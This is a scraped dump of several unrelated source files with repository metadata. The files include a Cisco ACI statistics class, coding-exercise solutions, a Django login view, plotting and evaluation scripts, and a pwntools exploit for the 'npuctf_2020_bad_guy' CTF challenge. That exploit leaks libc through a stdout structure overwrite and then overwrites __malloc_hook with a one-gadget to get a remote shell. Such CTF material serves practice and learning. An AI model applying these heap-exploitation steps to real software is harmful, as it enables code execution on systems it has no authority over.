prop._addConstant("maxWarn", "max-severity-warning", 2147483648) prop._addConstant("minCrit", "min-severity-critical", 134217728) prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304) prop._addConstant("minLow", "min-crossed-low-threshold", 8388608) prop._addConstant("minMajor", "min-severity-major", 67108864) prop._addConstant("minMinor", "min-severity-minor", 33554432) prop._addConstant("minRecovering", "min-recovering", 2097152) prop._addConstant("minWarn", "min-severity-warning", 16777216) prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576) prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768) prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536) prop._addConstant("periodicMajor", "periodic-severity-major", 524288) prop._addConstant("periodicMinor", "periodic-severity-minor", 262144) prop._addConstant("periodicRecovering", "periodic-recovering", 16384) prop._addConstant("periodicWarn", "periodic-severity-warning", 131072) prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968) prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624) prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248) prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984) prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992) prop._addConstant("rateRecovering", "rate-recovering", 562949953421312) prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496) prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656) prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208) prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416) prop._addConstant("trendMajor", "trend-severity-major", 140737488355328) prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664) prop._addConstant("trendRecovering", "trend-recovering", 4398046511104) prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832) prop._addConstant("unspecified", None, 0) meta.props.add("crcCountThr", prop) prop = PropMeta("str", "crcCountTr", "crcCountTr", 45233, PropCategory.IMPLICIT_TREND) prop.label = "CRC Align Errored Packets trend" prop.isOper = True prop.isStats = True meta.props.add("crcCountTr", prop) prop = PropMeta("str", "crcMax", "crcMax", 43585, PropCategory.IMPLICIT_MAX) prop.label = "CRC Align Errors maximum value" prop.isOper = True prop.isStats = True meta.props.add("crcMax", prop) prop = PropMeta("str", "crcMin", "crcMin", 43584, PropCategory.IMPLICIT_MIN) prop.label = "CRC Align Errors minimum value" prop.isOper = True prop.isStats = True meta.props.add("crcMin", prop) prop = PropMeta("str", "crcSpct", "crcSpct", 43587, PropCategory.IMPLICIT_SUSPECT) prop.label = "CRC Align Errors suspect count" prop.isOper = True prop.isStats = True meta.props.add("crcSpct", prop) prop = PropMeta("str", "crcThr", "crcThr", 43588, PropCategory.IMPLICIT_THRESHOLDED) prop.label = "CRC Align Errors thresholded flags" prop.isOper = True prop.isStats = True prop.defaultValue = 0 prop.defaultValueStr = "unspecified" prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552) prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736) prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472) prop._addConstant("avgMajor", "avg-severity-major", 1099511627776) prop._addConstant("avgMinor", "avg-severity-minor", 549755813888) prop._addConstant("avgRecovering", "avg-recovering", 34359738368) prop._addConstant("avgWarn", "avg-severity-warning", 274877906944) prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192) prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256) prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512) prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096) prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048) prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128) prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024) prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64) prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2) prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4) prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32) prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16) prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1) prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8) prop._addConstant("maxCrit", "max-severity-critical", 17179869184) prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912) prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824) prop._addConstant("maxMajor", "max-severity-major", 8589934592) prop._addConstant("maxMinor", "max-severity-minor", 4294967296) prop._addConstant("maxRecovering", "max-recovering", 268435456) prop._addConstant("maxWarn", "max-severity-warning", 2147483648) prop._addConstant("minCrit", "min-severity-critical", 134217728) prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304) prop._addConstant("minLow", "min-crossed-low-threshold", 8388608) prop._addConstant("minMajor", "min-severity-major", 67108864) prop._addConstant("minMinor", "min-severity-minor", 33554432) prop._addConstant("minRecovering", "min-recovering", 2097152) prop._addConstant("minWarn", "min-severity-warning", 16777216) prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576) prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768) prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536) prop._addConstant("periodicMajor", "periodic-severity-major", 524288) prop._addConstant("periodicMinor", "periodic-severity-minor", 262144) prop._addConstant("periodicRecovering", "periodic-recovering", 16384) prop._addConstant("periodicWarn", "periodic-severity-warning", 131072) prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968) prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624) prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248) prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984) prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992) prop._addConstant("rateRecovering", "rate-recovering", 562949953421312) prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496) prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656) prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208) prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416) prop._addConstant("trendMajor", "trend-severity-major", 140737488355328) prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664) prop._addConstant("trendRecovering", "trend-recovering", 4398046511104) prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832) prop._addConstant("unspecified", None, 0) meta.props.add("crcThr", prop) prop = PropMeta("str", "crcTr", "crcTr", 43589, PropCategory.IMPLICIT_TREND) prop.label = "CRC Align Errors trend" prop.isOper = True prop.isStats = True meta.props.add("crcTr", prop) prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN) prop.label = "None" prop.isDn = True prop.isImplicit = True prop.isAdmin = True prop.isCreateOnly = True meta.props.add("dn", prop) prop = PropMeta("str", "index", "index", 115, PropCategory.REGULAR) prop.label = "History Index" prop.isImplicit = True prop.isAdmin = True meta.props.add("index", prop) prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR) prop.label = "Collection Length" prop.isImplicit = True prop.isAdmin = True meta.props.add("lastCollOffset", prop) prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR) prop.label = "Reporting End Time" prop.isImplicit = True prop.isAdmin = True meta.props.add("repIntvEnd", prop) prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR) prop.label = "Reporting Start Time" prop.isImplicit = True prop.isAdmin = True meta.props.add("repIntvStart", prop) prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN) prop.label = "None" prop.isRn = True prop.isImplicit = True prop.isAdmin = True prop.isCreateOnly = True meta.props.add("rn", prop) prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop._addConstant("created", "created", 2) prop._addConstant("deleted", "deleted", 8) prop._addConstant("modified", "modified", 4) meta.props.add("status", prop) def __init__(self, parentMoOrDn, markDirty=True, **creationProps): namingVals = [] Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps) # End of package file # ##################################################
[ "rrishike@cisco.com" ]
rrishike@cisco.com
c5c6fbb99ac0691b8a7dfdef534b8d24fd07f978
7b9527f6a66bf544071c07498163883ae33ff9ec
/python/1890.py
abe9b60579196c7c25b4d2637e34034451d9754d
[]
no_license
rhyun9584/BOJ
ec4133718934e59689cdcc0d3284bad9a412dc7a
f4c651da7c4840595175abf201d07151d4ac9402
refs/heads/master
2023-08-31T21:29:07.550395
2023-08-25T16:53:53
2023-08-25T16:53:53
225,122,352
0
0
null
null
null
null
UTF-8
Python
false
false
861
py
# 갈 수 없는 경로에 대해 체크할 수 있으면 시간이 더 줄어들것같은데... import sys sys.setrecursionlimit(10**5) N = int(input()) maps = [list(map(int, input().split())) for _ in range(N)] dp_table = [[0]*N for _ in range(N)] dp_table[N-1][N-1] = 1 road = [] def dfs(x, y): global count d = maps[x][y] if dp_table[x][y] > 0: # (x,y)에 도착했을때 이미 갈 수 있는 경로의 경우의 수가 기록된 위치인 경우 # 그 경우의 수 만큼 더해주어 기록 for rx, ry in road: dp_table[rx][ry] += dp_table[x][y] return # 중간에 0을 만나면 더이상 갈 수 없음 if d == 0: return road.append((x,y)) if x + d < N: dfs(x+d, y) if y + d < N: dfs(x, y+d) road.pop() dfs(0, 0) print(dp_table[0][0])
[ "rhyun9584@naver.com" ]
rhyun9584@naver.com
f0273087f58f8b16f942e2277ca294b63150082b
7e40c8bb28c2cee8e023751557b90ef7ef518326
/npuctf_2020_bad_guy/npuctf_2020_bad_guy.py
932efdc96ee2919b873e1565c181f2bb8861c812
[]
no_license
1337536723/buuctf_pwn
b6e5d65372ed0638a722faef1775026a89321fa3
cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf
refs/heads/master
2023-08-29T19:35:04.352530
2021-11-16T14:06:20
2021-11-16T14:06:20
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,190
py
from pwn import * #context.log_level = 'debug' context.arch = 'amd64' #p = remote('node4.buuoj.cn', ) libc = ELF('libc-2.23.buu.so') ru = lambda s : p.recvuntil(s) sn = lambda s : p.send(s) sla = lambda r, s : p.sendlineafter(r, s) sa = lambda r, s : p.sendafter(r, s) sl = lambda s : p.sendline(s) rv = lambda s : p.recv(s) def debug(s): gdb.attach(p, ''' source ~/libc/loadsym.py loadsym ~/libc/2.23/64/libc-2.23.debug.so ''' + s) def alloc(index, size, content): sla(b'>> ', b'1') sla(b'Index :', str(index).encode()) sla(b'size: ', str(size).encode()) sa(b'Content:', content) def edit(index, size, content): sla(b'>> ', b'2') sla(b'Index :', str(index).encode()) sla(b'size: ', str(size).encode()) sa(b'content:', content) def delete(index): sla(b'>> ', b'3') sla(b'Index :', str(index).encode()) def exp(): alloc(0, 0x10, b'a') alloc(1, 0x10, b'a') alloc(2, 0x60, b'a') alloc(3, 0x10, b'a') delete(2) edit(0, 0x20, b'\x00' * 0x10 + p64(0) + p64(0x91)) delete(1) alloc(1, 0x10, b'a') edit(1, 0x22, b'a' * 0x10 + p64(0) + p64(0x71) + b'\xdd\x85') alloc(2, 0x60, b'a') # padding flag read_buf write_buf layout = [ '\x00' * 0x33, 0xfbad1800, 0, 0, 0, b'\x58' ] alloc(3, 0x60, flat(layout)) one_gadgets = [0x45206, 0x4525a, 0xef9f4, 0xf0897] one_gadgets_buu = [0x45216, 0x4526a, 0xf02a4, 0xf1147] libc_base = u64(rv(8)) - libc.sym['_IO_2_1_stdout_'] - 131 malloc_hook = libc_base + libc.sym['__malloc_hook'] one = libc_base + one_gadgets_buu[3] success('libc_base -> {}'.format(hex(libc_base))) #uaf alloc(0, 0x60, b'a') alloc(0, 0x60, b'a') alloc(1, 0x60, b'a') alloc(2, 0x60, b'a') alloc(3, 0x30, b'a') #avoid merge edit(0, 0x70, b'\x00' * 0x60 + p64(0) + p64(0xe1)) delete(1) alloc(1, 0x60, b'a') alloc(3, 0x60, b'a') delete(3) edit(2, 0x8, p64(malloc_hook - 0x23)) alloc(0, 0x60, b'a') alloc(0, 0x60, b'\x00' * 0x13 + p64(one)) sla(b'>> ', b'1') sla(b'Index :', b'0') sla(b'size: ', b'20') p.interactive() if __name__ == "__main__": while True: try: #p = process('./npuctf_2020_bad_guy') p = remote('node4.buuoj.cn', 29604) exp() break except: p.close()
[ "admin@srmxy.cn" ]
admin@srmxy.cn
7280ce1423804ba07d711d41cda2d662613bc199
809e1b7ca0d9e265c4f3e49e18e4e3c64e561526
/login/loginreg/views - Copy.py
f0f7cf87a84a6fd07bf8955930eddf73b1b74626
[]
no_license
gitanjali1077/Login
e4a9c6ede5916a2d42440b29fdf424ad6a80a688
5823579b14df68874c8df07a95ec9a796b705207
refs/heads/master
2021-01-22T21:41:33.529308
2017-08-14T15:45:43
2017-08-14T15:45:43
85,465,261
0
0
null
null
null
null
UTF-8
Python
false
false
4,251
py
from login.settings import SENDER,PASS import smtplib from django.shortcuts import render,render_to_response from django import forms from django.views.generic import View from django.views.generic.edit import FormView from django.views import generic #require a form to create a new object from django.views.generic.edit import CreateView,UpdateView ,DeleteView # for uploading form from django.core.urlresolvers import reverse_lazy # for login from django.shortcuts import render,redirect from django.contrib.auth import authenticate,login,logout from django.views.generic import View from .forms import UserForm ,UserFormlog from django.template import RequestContext from django.contrib.auth import views as auth_views from django.contrib import auth from django.contrib.auth.decorators import login_required # Create your views here. def create_profile(request): if request.method == 'GET': user_form = UserForm return render(request, 'profile.html', { 'user_form': user_form }) if request.method == 'POST': user_form = UserForm(request.POST) if user_form.is_valid() : user1= user_form.save(commit=False) #prof= profile_form.save() username = user_form.cleaned_data['username'] fname = user_form.cleaned_data['first_name'] password = user_form.cleaned_data['password'] email = user_form.cleaned_data['email'] user1.set_password(password) user1.save() msg="Hello , \n Welcome here" smtp= smtplib.SMTP('smtp.gmail.com') smtp.ehlo() smtp.starttls() smtp.ehlo() smtp.login(SENDER,PASS) smtp.sendmail(SENDER,email,msg) smtp.quit() #profile=profile_form.save(commit=False) #profile.user_id=user1.id+1 #profile.college=profile_form.cleaned_data['college'] #profile.save() user = authenticate(username=username ,password=password) if user is not None: if user.is_active: login(request, user) return redirect('index.html') #return render(request,'index.html' #profile_form.save() #return redirect('settings:profile') return render(request, 'register/profile.html', { 'user_form': user_form }) def indexpage(request): if request.method == 'GET': user_form = UserForm return render(request, 'index.html', ) global user_form1 #@login_required for stopping user from some pages def userlogin(request): ab="pagal hai" if request.method == 'GET': user_form = UserFormlog return render(request, 'login.html', { 'form': user_form #user_form }) if request.method == 'POST': user_form1 = UserFormlog(request.POST) if user_form1.is_valid() : ab="post chala" #prof= profile_form.save() username = user_form1.cleaned_data['username'] password = user_form1.cleaned_data['password'] #profile=profile_form.save(commit=False) #profile.user_id=user1.id+1 #profile.college=profile_form.cleaned_data['college'] #profile.save() user1 = authenticate(username=username ,password=password) if user1 : auth.login(request, user1) #return redirect('index.html') return render(request,'index.html',{ 'user1': user_form1 }) else: return redirect('nope.html') #profile_form.save() #return redirect('settings:profile') else: print user_form1.errors return render(request, 'login.html', { 'user_form': user_form1 ,'ab':ab }) def logout(request): auth.logout(request) #user_form1= users.objects.filter(user__username=request.user) user_form1=request.user user_form1.username='' return render_to_response('login.html', {'box_width': '402', 'logged_out': '1',}) # context_instance=RequestContext(request))
[ "gitanjali1077@gmail.com" ]
gitanjali1077@gmail.com
65804be70908e44da99b1c7b18eab58a05435784
5fff534c0f5b5c1de498a9be7d7cd7f1f86ba5a1
/myvenv/bin/viewer.py
8aaa5b0ed68e599bb3af7c711324c71e7f4f1f55
[]
no_license
baidoosik/portfolio
1287d2e4803608f83e1ba4190d82af76fd29db08
6f4b2c861231fae326d47cbbe9711139ab041d59
refs/heads/master
2021-01-18T03:14:01.288730
2017-06-14T14:59:51
2017-06-14T14:59:51
85,835,651
0
0
null
null
null
null
UTF-8
Python
false
false
998
py
#!/Users/doosikbai/worldnomade/myvenv/bin/python3 # # The Python Imaging Library # $Id$ # from __future__ import print_function try: from tkinter import Tk, Label except ImportError: from Tkinter import Tk, Label from PIL import Image, ImageTk # # an image viewer class UI(Label): def __init__(self, master, im): if im.mode == "1": # bitmap image self.image = ImageTk.BitmapImage(im, foreground="white") Label.__init__(self, master, image=self.image, bg="black", bd=0) else: # photo image self.image = ImageTk.PhotoImage(im) Label.__init__(self, master, image=self.image, bd=0) # # script interface if __name__ == "__main__": import sys if not sys.argv[1:]: print("Syntax: python viewer.py imagefile") sys.exit(1) filename = sys.argv[1] root = Tk() root.title(filename) im = Image.open(filename) UI(root, im).pack() root.mainloop()
[ "qoentlr37@naver.com" ]
qoentlr37@naver.com
7b710a4e7e7137dd09a8b44701b6dd14e45c605a
4fbd844113ec9d8c526d5f186274b40ad5502aa3
/algorithms/python3/arithmetic_slices.py
c77282972d02cdeaf46c52a16d55caf6ef39dc8d
[]
no_license
capric8416/leetcode
51f9bdc3fa26b010e8a1e8203a7e1bcd70ace9e1
503b2e303b10a455be9596c31975ee7973819a3c
refs/heads/master
2022-07-16T21:41:07.492706
2020-04-22T06:18:16
2020-04-22T06:18:16
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,095
py
# !/usr/bin/env python # -*- coding: utf-8 -*- """ A sequence of number is called arithmetic if it consists of at least three elements and if the difference between any two consecutive elements is the same. For example, these are arithmetic sequence: 1, 3, 5, 7, 9 7, 7, 7, 7 3, -1, -5, -9 The following sequence is not arithmetic. 1, 1, 2, 5, 7 A zero-indexed array A consisting of N numbers is given. A slice of that array is any pair of integers (P, Q) such that 0 <= P < Q < N. A slice (P, Q) of array A is called arithmetic if the sequence: A[P], A[p + 1], ..., A[Q - 1], A[Q] is arithmetic. In particular, this means that P + 1 < Q. The function should return the number of arithmetic slices in the array A. Example: A = [1, 2, 3, 4] return: 3, for 3 arithmetic slices in A: [1, 2, 3], [2, 3, 4] and [1, 2, 3, 4] itself. """ """ ==================== body ==================== """ class Solution: def numberOfArithmeticSlices(self, A): """ :type A: List[int] :rtype: int """ """ ==================== body ==================== """
[ "capric8416@gmail.com" ]
capric8416@gmail.com
1a28e3779dba8c219f0d15eae95d6f27d2cc046a
99ec9dbc139fda4d2b29509dcf606cf836eacc5f
/Dust-wave/zones-v-n-plane-RSG.py
6625fd7fe00248f28491c893b585b5e894f714c3
[]
no_license
will-henney/bowshock-shape
1f1caa9a6fea2681ce356d5679cafacef2aab9e1
dfdb1f997bf05fa0f8a5b5101aeaa8d4292e012f
refs/heads/master
2022-11-17T09:22:46.334456
2020-07-14T04:29:22
2020-07-14T04:29:22
5,662,223
0
0
null
null
null
null
UTF-8
Python
false
false
4,705
py
import sys import numpy as np from matplotlib import pyplot as plt import seaborn as sns from vec_root import chandrupatla figname = sys.argv[0].replace('.py', '.pdf') sns.set_style('ticks') sns.set_color_codes('dark') fig, axes = plt.subplots(1, 1, sharex=True, sharey=True, figsize=(3.3, 4)) stardata = [ [20.0, 15.6, 0.0476, 0.0, axes], ] # Velocities in units of km/s (10 km/s -> 100 km/s) vgrid = np.linspace(10.0, 100.0, 800) # Densities in units of 1 pcc (0.01 -> 1e5) logngrid = np.linspace(-3.3, 6.3, 800) # 2d versions of velocity and density grids vv, nn = np.meshgrid(vgrid, 10**logngrid) def rstar(v10, n, L4): """Characteristic radius in pc""" return 2.21*np.sqrt(L4/n)/v10 def taustar(v10, n, L4, kappa600=1.0): """Characteristic optical depth""" return 0.0089*kappa600*np.sqrt(L4*n)/v10 def xfunc(x, ts, eta): """Function to be zeroed to find x""" return x**2 - (1.0 - np.exp(-2*ts*x)) - eta R0s = (0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1.0, 3.0, 10.0, 30.0) lws = np.linspace(0.3, 2.5, len(R0s)) cformats = { 0.0001: "0.0001 pc", 0.001: "0.001 pc", 0.01: "0.01 pc", 0.1: "0.1 pc", 1.0: "1 pc", 10.0: "10 pc", } clevs_to_label = list(cformats.keys()) box_params = dict(fc='w', ec='0.8', lw=0.4, pad=2) RBW_label = r"Radiation bow wave, $\eta < \tau < 1$" RBS_label = r"Radiation bow shock, $\tau > 1$" WBS_label = r"Wind bow shock, $\tau < \eta$" # Miscellaneous panel-dependent plot params d = { "RBW y": {33.0: 1500.0, 20.0: 1e5, 40.0: 2500.0}, "trapped y": {33.0: 250, 20.0: 2.5e5, 40.0: 1.5e5}, "trapped bg": {33.0: 'w', 20.0: 'w', 40.0: 'w'}, "IF tau": {33.0: 0.2, 20.0: 3.7, 40.0: 6.4}, "IF tau gas": {33.0: 5.0, 20.0: 5.0, 40.0: 5.0}, } T0 = 1000 kappa = 60.0 for M, L4, eta, S49, ax in stardata: Mlabel = "\n".join([ "M supergiant", "", rf"$M = {M:.0f}\, M_\odot$", rf"$L = {1e4*L4:.1e}\, L_\odot$".replace("e+0", r"\times 10^"), rf"$\eta = {eta}$"]) Rs = rstar(vv/10, nn, L4) ts = taustar(vv/10, nn, L4, kappa600=kappa/600.0) a, b = 0.0, 2*np.sqrt(1.0 + eta) x = chandrupatla(xfunc, a, b, args=(ts, eta)) R0 = x*Rs tau = 2*x*ts ax.contourf(vv, nn, tau, (eta, 1.0), colors='k', alpha=0.15) # ax.contour(vv, nn, tau, (eta/3, eta, 3*eta), colors='r') # ax.contour(vv, nn, tau, (1.0, 3.0), colors='m') cs = ax.contour(vv, nn, R0, R0s, linewidths=lws, colors='k') clevs = [level for level in clevs_to_label if level in cs.levels] ax.clabel(cs, clevs, fontsize='x-small', fmt=cformats, inline=True, inline_spacing=2, use_clabeltext=True) ax.text(62.0, 1e-2, Mlabel, zorder=100, fontsize='x-small', bbox=box_params) ax.text(18.0, d["RBW y"][M], RBW_label, rotation=15, fontsize='xx-small', bbox={**box_params, **dict(fc='0.85', ec='0.6')}) ax.text(16.0, 2e6, RBS_label, rotation=15, fontsize='xx-small', bbox=box_params) ax.text(20.0, 300.0, WBS_label, rotation=15, fontsize='xx-small', bbox=box_params) # # Now do the cooling length # # Sound speed: cs = 11.4*np.sqrt(T0/1e4) # pre-shock Mach number M0 = vv/cs # post-shock Mach number M1 = np.sqrt((M0**2 + 3)/(5*M0**2 - 1)) # post-shock temperature in units of T0 T1 = (5*M0**2 - 1)*(1 + 3/M0**2) / 16 # post-shock density n1 = nn*4*M0**2 / (M0**2 + 3) # post-shock velocity v1 = vv*nn/n1 # Cooling rate Lam1 = 3.3e-24 * (T1*T0/1e4)**2.3 Lam2 = 1e-20 / (T1*T0/1e4) k = 3 Lambda = (Lam1**(-k) + Lam2**(-k))**(-1/k) # Heating rate Gamma = 1e-26 # Cooling length in parsec dcool = 3*(1e5*v1)*(1.3806503e-16 * T1*T0) / (n1*(Lambda - Gamma)) / 3.085677582e18 dcool[vv < cs] = np.nan # Ratio with respect to adiabatic shell thickness h1 = 0.177*R0 cool_ratio1 = dcool / R0 # Ratio with respect to isothermal shell thickness h2 = 3*R0/(4*M0**2) * (2 / (1 + np.sqrt(1 + (18/M0**2)) )) cool_ratio2 = dcool / h2 cs = ax.contour(vv, nn, cool_ratio1, (1.0,), linewidths=2, colors='b', alpha=0.5) ax.clabel(cs, fontsize='xx-small', fmt=r"$d_\mathrm{cool} = R_0$", inline=True, inline_spacing=2, use_clabeltext=True) cs = ax.contour(vv, nn, cool_ratio2, (1.0,), linewidths=1, colors='b', alpha=0.5) ax.clabel(cs, fontsize='xx-small', fmt=r"$d_\mathrm{cool} = h_0$", inline=True, inline_spacing=2, use_clabeltext=True) ax.set(yscale='log') axes.set(xlabel=r"$v$, km s$^{-1}$", ylabel=r"$n$, cm$^{-3}$") sns.despine() fig.tight_layout() fig.savefig(figname) print(figname, end='')
[ "will@henney.org" ]
will@henney.org
84b098542f09ce09f47cdfecd5c51858d6f9b957
088314e3bd6ca7ef34d15f2aa45b743b363641d9
/tasks/NDH/eval.py
c642e81a150d653a372f2db34e9c4c14b3f370b0
[ "MIT" ]
permissive
weituo12321/PREVALENT_R2R
7a27d580fcbe8f72a209697d053ca3eb2013e3a0
868fb53d6b7978bbb10439a59e65044c811ee5c2
refs/heads/master
2022-11-24T00:54:32.385940
2020-07-24T17:56:42
2020-07-24T17:56:42
248,832,547
8
7
MIT
2022-11-22T02:10:54
2020-03-20T19:07:08
Python
UTF-8
Python
false
false
8,272
py
''' Evaluation of agent trajectories ''' import json import os import sys from collections import defaultdict import networkx as nx import numpy as np import pprint pp = pprint.PrettyPrinter(indent=4) from env import R2RBatch from utils import load_datasets, load_nav_graphs from agent import BaseAgent, StopAgent, RandomAgent, ShortestAgent class Evaluation(object): ''' Results submission format: [{'instr_id': string, 'trajectory':[(viewpoint_id, heading_rads, elevation_rads),] } ] ''' def __init__(self, splits, path_type='planner_path'): self.error_margin = 3.0 self.splits = splits self.gt = {} self.instr_ids = [] self.scans = [] for item in load_datasets(splits): self.gt[item['inst_idx']] = item self.instr_ids.append(item['inst_idx']) self.scans.append(item['scan']) # Add 'trusted_path' to gt metadata if necessary. if path_type == 'trusted_path': planner_goal = item['planner_path'][-1] if planner_goal in item['player_path'][1:]: self.gt[item['inst_idx']]['trusted_path'] = item['player_path'][:] else: self.gt[item['inst_idx']]['trusted_path'] = item['planner_path'][:] self.scans = set(self.scans) self.instr_ids = set(self.instr_ids) self.graphs = load_nav_graphs(self.scans) self.distances = {} self.path_type = path_type for scan,G in self.graphs.items(): # compute all shortest paths self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G)) def _get_nearest(self, scan, goal_id, path): near_id = path[0][0] near_d = self.distances[scan][near_id][goal_id] for item in path: d = self.distances[scan][item[0]][goal_id] if d < near_d: near_id = item[0] near_d = d return near_id def _score_item(self, instr_id, path): ''' Calculate error based on the final position in trajectory, and also the closest position (oracle stopping rule). ''' gt = self.gt[int(instr_id)] start = gt[self.path_type][0] assert start == path[0][0], 'Result trajectories should include the start position' goal = gt[self.path_type][-1] planner_goal = gt['planner_path'][-1] # for calculating oracle planner success (e.g., passed over desc goal?) final_position = path[-1][0] nearest_position = self._get_nearest(gt['scan'], goal, path) nearest_planner_position = self._get_nearest(gt['scan'], planner_goal, path) dist_to_end_start = None dist_to_end_end = None for end_pano in gt['end_panos']: d = self.distances[gt['scan']][start][end_pano] if dist_to_end_start is None or d < dist_to_end_start: dist_to_end_start = d d = self.distances[gt['scan']][final_position][end_pano] if dist_to_end_end is None or d < dist_to_end_end: dist_to_end_end = d self.scores['nav_errors'].append(self.distances[gt['scan']][final_position][goal]) self.scores['oracle_errors'].append(self.distances[gt['scan']][nearest_position][goal]) self.scores['oracle_plan_errors'].append(self.distances[gt['scan']][nearest_planner_position][planner_goal]) self.scores['dist_to_end_reductions'].append(dist_to_end_start - dist_to_end_end) distance = 0 # Work out the length of the path in meters prev = path[0] for curr in path[1:]: if prev[0] != curr[0]: try: self.graphs[gt['scan']][prev[0]][curr[0]] except KeyError as err: print('Error: The provided trajectory moves from %s to %s but the navigation graph contains no '\ 'edge between these viewpoints. Please ensure the provided navigation trajectories '\ 'are valid, so that trajectory length can be accurately calculated.' % (prev[0], curr[0])) raise distance += self.distances[gt['scan']][prev[0]][curr[0]] prev = curr self.scores['trajectory_lengths'].append(distance) self.scores['shortest_path_lengths'].append(self.distances[gt['scan']][start][goal]) def score(self, output_file): ''' Evaluate each agent trajectory based on how close it got to the goal location ''' self.scores = defaultdict(list) instr_ids = set(self.instr_ids) with open(output_file) as f: for item in json.load(f): # Check against expected ids if item['inst_idx'] in instr_ids: instr_ids.remove(item['inst_idx']) self._score_item(item['inst_idx'], item['trajectory']) assert len(instr_ids) == 0, 'Trajectories not provided for %d instruction ids: %s' % (len(instr_ids), instr_ids) assert len(self.scores['nav_errors']) == len(self.instr_ids) num_successes = len([i for i in self.scores['nav_errors'] if i < self.error_margin]) sc_idx = np.array([i < self.error_margin for i in self.scores['nav_errors']]) oracle_successes = len([i for i in self.scores['oracle_errors'] if i < self.error_margin]) oracle_plan_successes = len([i for i in self.scores['oracle_plan_errors'] if i < self.error_margin]) spls = [] for err, length, sp in zip(self.scores['nav_errors'], self.scores['trajectory_lengths'], self.scores['shortest_path_lengths']): if err < self.error_margin: if sp > 0: spls.append(sp / max(length, sp)) else: # In IF, some Q/A pairs happen when we're already in the goal region, so taking no action is correct. spls.append(1 if length == 0 else 0) else: spls.append(0) score_summary ={ 'length': np.average(self.scores['trajectory_lengths']), 'nav_error': np.average(self.scores['nav_errors']), 'oracle success_rate': float(oracle_successes)/float(len(self.scores['oracle_errors'])), 'success_rate': float(num_successes)/float(len(self.scores['nav_errors'])), 'spl': np.average(spls), 'oracle path_success_rate': float(oracle_plan_successes)/float(len(self.scores['oracle_plan_errors'])), 'dist_to_end_reduction': sum(self.scores['dist_to_end_reductions']) / float(len(self.scores['dist_to_end_reductions'])), 'sc_dr': sum(np.array(self.scores['dist_to_end_reductions'])[sc_idx]) / float(len(self.scores['dist_to_end_reductions'])) } assert score_summary['spl'] <= score_summary['success_rate'] return score_summary, self.scores RESULT_DIR = 'tasks/NDH/results/' def eval_simple_agents(): # path_type = 'planner_path' # path_type = 'player_path' path_type = 'trusted_path' ''' Run simple baselines on each split. ''' for split in ['train', 'val_seen', 'val_unseen', 'test']: env = R2RBatch(None, batch_size=1, splits=[split], path_type=path_type) ev = Evaluation([split], path_type=path_type) for agent_type in ['Stop', 'Shortest', 'Random']: outfile = '%s%s_%s_agent.json' % (RESULT_DIR, split, agent_type.lower()) agent = BaseAgent.get_agent(agent_type)(env, outfile) agent.test() agent.write_results() score_summary, _ = ev.score(outfile) print('\n%s' % agent_type) pp.pprint(score_summary) def eval_seq2seq(): ''' Eval sequence to sequence models on val splits (iteration selected from training error) ''' outfiles = [ RESULT_DIR + 'seq2seq_teacher_imagenet_%s_iter_5000.json', RESULT_DIR + 'seq2seq_sample_imagenet_%s_iter_20000.json' ] for outfile in outfiles: for split in 